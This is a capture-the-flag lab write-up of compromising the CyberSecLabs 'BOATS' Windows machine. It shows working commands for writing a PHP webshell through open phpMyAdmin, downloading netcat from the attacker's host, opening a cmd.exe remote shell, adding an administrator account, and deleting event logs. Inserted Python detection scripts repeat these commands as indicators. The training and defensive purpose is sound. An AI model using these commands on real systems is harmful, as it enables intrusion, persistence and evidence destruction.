CyberSecLabs "BOATS" Windows Challenge Without Metasploit - Privesc Edition


Today we are going to go over the newly released "BOATS" Windows machine from CyberSecLabs.  This is another excellent release, and it has a few different paths to machine takeover.  With that, I've decided that going forward each guide will include post-exploitation tasks, which are usually overlooked in CTF walkthroughs despite being one of the most important things we do in pentesting.  As with my last several guides, this one will also be done without Metasploit, although none of the paths to completion on this machine actually need it.  So sit back, start up your BOATS machine over at https://cyberseclabs.co.uk and let's get to work.

Scanning

As always, let's get a quick look at our attack surface on the machine.  As we can see, we have several ports open.  We will need to run our Nmap -A scan as well to gather some more information.

nmap 172.31.1.14

nmap -A 172.31.1.14

As we can see, this is a machine that is clearly running some sort of website.  The server is running Apache, PHP appears to be present, and WordPress is installed.  Additionally we see that SMB is running, along with a MySQL server and RDP.  A quick look at the website shows us something about battleships, and a lot of other things going on.

Enumeration

Now that we have a basic understanding of our attack surface, we should run a directory scan to see what we have available.  We can use Gobuster for this.

./gobuster dir -u 172.31.1.14 -w /root/desktop/directories/directory-list-2.3-small.txt

As expected we are picking up a bunch of web server specific subdirectories, including one named phpmyadmin.  Let's check that one out first by visiting 172.31.1.14/phpmyadmin.
Unrestricted phpMYADMIN page

What we see isn't good.  The phpMyAdmin page does not require any user credentials to access, and we can tell that we are running as the root user for the service.  Additionally, we see a link on the left named "wordpress."  This most likely pertains to the WordPress service that is running.  Let's check that next.

wp_users Table in the wordpress database

Clicking on the wp_users table, we are able to see that the user james exists, along with what looks like a PHP password hash.  For now we will hold off on cracking passwords until we've exhausted all other access options.  Let's do some quick research and see if we are able to exploit phpMyAdmin.  Specifically, let's search whether it's possible to inject code to open a command shell.

Searching for phpMyAdmin reverse shell

We can quickly discover that there is a way for us to inject a basic PHP page into the server that will allow us to run command line functions from the address bar.  Let's give it a try.

Exploitation

We will need to navigate to the WordPress database we discovered and, using the SQL tab at the top of the dashboard, insert the code shown in the following image.  This will create a PHP page on the server that will allow us to issue commands from the address bar.  Here's how.

SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "C:\\xampp\\htdocs\\backdoor.php"

We may or may not receive confirmation that it was successful after pressing the Go button; however, if we attempt to issue the command again it will tell us whether it already succeeded.  In this case it did, and we now have our backdoor installed.  If we type in 172.31.1.14/backdoor.php?cmd= followed by our desired command, we will have limited shell access to the machine.  In this case, we run whoami, and see that a terrible mistake was made by the System Administrator.  We have system privileges.

172.31.1.14/backdoor.php?cmd=whoami

We can prepare for pivoting by using the backdoor to create a new user for us to utilize in the near future, as well as to show proof of exploit that we have compromised the administrator and the machine.

net users themayor passredacted /add

We don't want to work out of the command line for long, as it is tedious and our ability to function is limited.  So let's grab a Netcat binary from our machine to use for initial persistence and ease of access.  We can do this by using a Python SimpleHTTPServer and the PowerShell wget command.  Here's how.

Bottom - python -m SimpleHTTPServer 8181 (from your NC.exe binary location); Top - powershell -c wget "http://10.10.0.14:8181/nc.exe" -outfile "nc.exe"

We can see from the Python server output that nc.exe has transferred.  Let's quickly confirm.  We can do that by running "dir" through the backdoor.

172.31.1.14/backdoor.php?cmd=dir

As we can see, the transfer has occurred successfully, and we have a Netcat binary on the target machine.  We can now send our final backdoor command by running nc.exe as a listener and sending a connection request from our attack machine.  This is successful as seen below.

Top - nc.exe -nlvp 4444 -e cmd.exe ; Bottom - nc 172.31.1.14 4444
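As an added, defender-side example (not part of the original walkthrough), this Python script scans constructed Apache access-log lines, modelled on the requests in this section, for the trail the chain above leaves: requests to a PHP file carrying a cmd-style query parameter, with the decoded command checked for download, listener and account-management fragments.  The log lines, client IPs and timestamps are constructed; the file name and parameter name match the walkthrough.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache access-log lines (combined-log style, trimmed) modelled on
# the requests in the walkthrough; the client IPs and timestamps are made up.
SAMPLE_LOG = """\
10.10.0.14 - - [12/Apr/2020:10:01:03 +0000] "GET /phpmyadmin/sql.php?db=wordpress HTTP/1.1" 200 5120
10.10.0.14 - - [12/Apr/2020:10:02:11 +0000] "GET /backdoor.php?cmd=whoami HTTP/1.1" 200 34
10.10.0.14 - - [12/Apr/2020:10:03:40 +0000] "GET /backdoor.php?cmd=net%20users%20themayor%20passredacted%20/add HTTP/1.1" 200 60
10.10.0.14 - - [12/Apr/2020:10:05:02 +0000] "GET /backdoor.php?cmd=powershell%20-c%20wget%20%22http://10.10.0.14:8181/nc.exe%22%20-outfile%20%22nc.exe%22 HTTP/1.1" 200 12
10.10.0.14 - - [12/Apr/2020:10:06:15 +0000] "GET /backdoor.php?cmd=nc.exe%20-nlvp%204444%20-e%20cmd.exe HTTP/1.1" 200 0
192.168.1.20 - - [12/Apr/2020:10:07:00 +0000] "GET /wp-login.php HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Parameter names one-line PHP webshells commonly read (assumed list).
SHELL_PARAMS = {"cmd", "c", "exec", "command"}
# Fragments of the post-exploitation commands used in this walkthrough.
SUSPICIOUS = ("powershell", "wget", "nc.exe", "-e cmd", "net user", "net localgroup")
# Note: the INTO OUTFILE write that planted the file is blocked when MySQL's
# secure_file_priv is set; this script only covers the web-server side.

def analyse_access_log(text):
    """Return one finding per request that looks like webshell command execution."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        if not parts.path.endswith(".php"):
            continue
        query = parse_qs(parts.query)            # percent-decodes the values
        for name in sorted(SHELL_PARAMS & set(query)):
            for cmd in query[name]:
                hits = [s for s in SUSPICIOUS if s in cmd.lower()]
                findings.append({
                    "ip": m["ip"], "time": m["ts"], "path": parts.path,
                    "command": cmd, "indicators": hits,
                    "severity": "high" if hits else "medium",   # any fragment escalates
                })
    return findings

if __name__ == "__main__":
    for f in analyse_access_log(SAMPLE_LOG):
        print(f"{f['severity']:6} {f['ip']} {f['path']} -> {f['command']!r} {f['indicators']}")
```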

Now that we have a proper shell we can get to work finishing the CTF portion of the machine by gathering the flags in their normal spots.  In this case, james is our user.

Access.txt flag located in user "james" Desktop directory

System.txt flag located in the Administrator's Desktop directory

For those only interested in gaining access to the flags for the CTF, your job here is officially done.  However, if you want to continue on and gain access to the Windows Server 2012 environment that is running, please continue on.

Post Exploitation

For those who are continuing on, thanks for joining in!  Post exploitation is something almost entirely overlooked in walkthroughs, including mine (until now).  Post-exploitation tasks include gaining persistence on the machine, continued elevation of privileges until server or domain takeover/compromise, and, depending on the engagement, clearing or poisoning log entries to hide access.  We will only briefly cover log manipulation, as that is geared more towards the more advanced red-teaming engagements, but we will do some.

Earlier we saw that I had created a user to show proof of exploit.  This can also be leveraged for persistent access to the machine.  Since we have access as a system user, we are able to add our user to the Administrators local group.

net localgroup "administrators" themayor /add

From here we can try to gain access to a Desktop interface using "xfreerdp."  We can do so using the command shown in the image below.  (If this doesn't work, you might have to add your created user to the "Remote Desktop Users" local group as we did above with Administrators.)

xfreerdp /u:themayor /p:passredacted /v:172.31.1.14

This command works without additional modification, and we are connected to the Remote Desktop environment.

Remote Desktop Environment - Windows Server 2012

We can click on the Windows Server icon in the bottom left corner next to the Windows menu to open the Windows Server control environment.  Navigating to the tools menu in the top right and clicking Computer Management, we can see that we have access to the entire management infrastructure for the machine.  

Administrator Users Group

It is at this point that you would want to review your Rules of Engagement, and consider contacting your point of contact for the project.  This has shown that a significant vulnerability exists in the environment and that it represents a critical security concern.

If you are working internally as part of a "red team," you may also consider additional actions to cover your tracks.  One of these is log manipulation.  We currently have full access to the server, and it is likely any skilled security team has already figured this out.  In case they haven't, you can take several actions; however, we will only cover one here today.

As we have compromised the server and hold administrator privileges, we also have the ability to modify the Administrator account (again, check your ROE first to ensure this is acceptable).  If permitted, you can change the password to something you know and then pivot from your account to the Administrator.  From there we can go to Event Viewer -> Windows Logs and manipulate these by deleting evidence of your activities on the created account.

Example logs from the created user administrator

Administrator deleting logs pertaining to the created user
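To show what the steps in this section look like from the blue-team side, here is an added Python example (not from the original post) that correlates simplified Windows Security events into a per-account timeline: account creation (4720), addition to a privileged local group (4732), a RemoteInteractive logon (4624 with logon type 10), an administrative password reset (4724) and clearing of the audit log (1102).  The records are constructed and trimmed to the fields the logic needs; the event IDs and logon type are the real Windows values, the field names are simplified.

```python
from collections import defaultdict

# Constructed, trimmed Security-log records mirroring this walkthrough's
# post-exploitation steps. Event IDs are real; field names are simplified.
SAMPLE_EVENTS = [
    {"id": 4624, "time": "2020-04-12T09:00:00", "target": "james", "logon_type": 2, "src_ip": "-"},
    {"id": 4720, "time": "2020-04-12T10:03:41", "subject": "SYSTEM", "target": "themayor"},
    {"id": 4732, "time": "2020-04-12T10:20:05", "subject": "SYSTEM", "target": "Administrators", "member": "themayor"},
    {"id": 4624, "time": "2020-04-12T10:22:30", "target": "themayor", "logon_type": 10, "src_ip": "10.10.0.14"},
    {"id": 4724, "time": "2020-04-12T10:30:00", "subject": "themayor", "target": "Administrator"},
    {"id": 1102, "time": "2020-04-12T10:35:12", "subject": "Administrator"},
]

PRIVILEGED_GROUPS = {"Administrators", "Remote Desktop Users"}

def triage_security_events(events):
    """Build a per-account timeline of the events this chain produces and score it.

    Returns (findings, log_cleared): findings maps account -> steps/score/flag,
    log_cleared lists (time, who) for every 1102 'audit log was cleared' event.
    """
    steps = defaultdict(list)
    log_cleared = []
    for ev in sorted(events, key=lambda e: e["time"]):      # ISO timestamps sort lexically
        if ev["id"] == 4720:                                  # user account created
            steps[ev["target"]].append(("created", ev["time"], ev["subject"]))
        elif ev["id"] == 4732 and ev["target"] in PRIVILEGED_GROUPS:   # member added to group
            steps[ev["member"]].append((f"added to {ev['target']}", ev["time"], ev["subject"]))
        elif ev["id"] == 4624 and ev["logon_type"] == 10:     # RemoteInteractive (RDP) logon
            steps[ev["target"]].append(("rdp logon", ev["time"], ev["src_ip"]))
        elif ev["id"] == 4724:                                # password reset by another principal
            steps[ev["subject"]].append((f"reset password of {ev['target']}", ev["time"], ev["subject"]))
        elif ev["id"] == 1102:
            # 1102 is written after the Security log is cleared, so the clear itself
            # remains visible locally (and earlier events survive on a forwarding collector).
            log_cleared.append((ev["time"], ev["subject"]))
    findings = {}
    for acct, timeline in steps.items():
        labels = [s[0] for s in timeline]
        score = sum([
            "created" in labels,
            any(l.startswith("added to") for l in labels),
            "rdp logon" in labels,
            any(l.startswith("reset password") for l in labels),
        ])
        # three or more of these stages on one new account is the pattern above
        findings[acct] = {"steps": timeline, "score": score, "suspicious": score >= 3}
    return findings, log_cleared

if __name__ == "__main__":
    print(triage_security_events(SAMPLE_EVENTS))
```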

Final Thoughts

Today we have covered the complete exploitation of a Windows Server, where our initial exploitation vector was an insecure phpMyAdmin service.  This box has another known vulnerability which I will not disclose here; however, I welcome you to enumerate some of the other services we didn't cover today in an attempt to find it.  I hope this guide helps you on your way, and thanks for stopping in!
